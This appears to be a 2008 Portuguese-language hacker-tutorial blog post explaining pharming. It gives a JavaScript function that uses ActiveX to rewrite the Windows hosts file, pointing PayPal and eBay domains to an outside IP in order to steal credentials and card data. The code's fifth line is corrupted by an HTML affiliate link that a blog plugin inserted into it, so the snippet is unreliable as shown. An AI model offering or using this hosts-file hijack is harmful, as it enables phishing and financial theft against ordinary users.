Pharming, mais um hack

Junho 25, 2008 on 11:20 am | In Informatica, JavaScript, Tutorial, Hacker |

Mas o que é pharming ? É a idéia de alterar, sequestrar ou mesmo contaminar o DNS da vítima para levar a vítima a um site falso, por traz disso, roubar dados pessoais, cartões de crédito, dados de banco e dentre outros (vai da imaginação de cada um), pode-se tambem criar um ponte através do de um site para o site desejado e monitorar os dados do trafego assim roubando as informações; mas porque estou falando disso aqui?! É pelo motivo que isso é feito ou pode ser feito através de sites mau intensionados com um simples código JavaScript, essa é a maneira mais utilizada.

No windows XP nos temos nossos host no seguinte arquivo :

C:/WINDOWS/system32/Drivers/etc/hosts

Que contem o seguinte :

127.0.0.1 localhost
Dizendo que o localhost aponta para este ip 127.0.0.1

Bom na verdade quando você digitar localhost no seu navegador ele irá procurar por este ip, caso não encontre ele vai tentando diversas combinações com www e .com e diversos outros.

O script abaixo mostra um exemplo de como podemos alterar o arquivo com Active-X no JavaScript, claro que o script ira pedir uma autorização, coisa que os hackers resolvem e você é afetado sem perceber. O que ele irá fazer é redirecionar o dominio digitado para o IP desejado.

PLAIN TEXT
JAVASCRIPT:
  1. function pharmer(){
  2. var fso = new ActiveXObject("Scripting.FileSystemObject");
  3. var pharm = fso.CreateTextFile("C:\\WINDOWS\\system32\\Drivers\\etc\\hosts", true);
  4. pharm.WriteLine('127.0.0.1       localhost');
  5. pharm.WriteLine('188.222.33.1    <a href="https://www.paypal.com/row/mrb/pal=2VAJ7L6XR6XWG"  class="alinks_links" onclick="return alinks_click(this);" title="Transferência de dinheiro? BrPay Americano"  style="padding-right: 13px; background: url(http://rafaelcunha.com/WordPress/wp-content/plugins/alinks/images/external.png) center right no-repeat;" rel="external">paypal</a>');
  6. pharm.WriteLine('188.222.33.1    www.paypal.com');
  7. pharm.WriteLine('188.222.33.1    ebay.com');
  8. pharm.WriteLine('188.222.33.1    www.ebay.com');
  9. pharm.Close();
  10. }

Coisas que só o 0x000000 nos ensina.  ; )


No Comments yet »

RSS feed for comments on this post. TrackBack URI

Leave a comment

XHTML: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <code> <em> <i> <strike> <strong>


 

 Assine o feed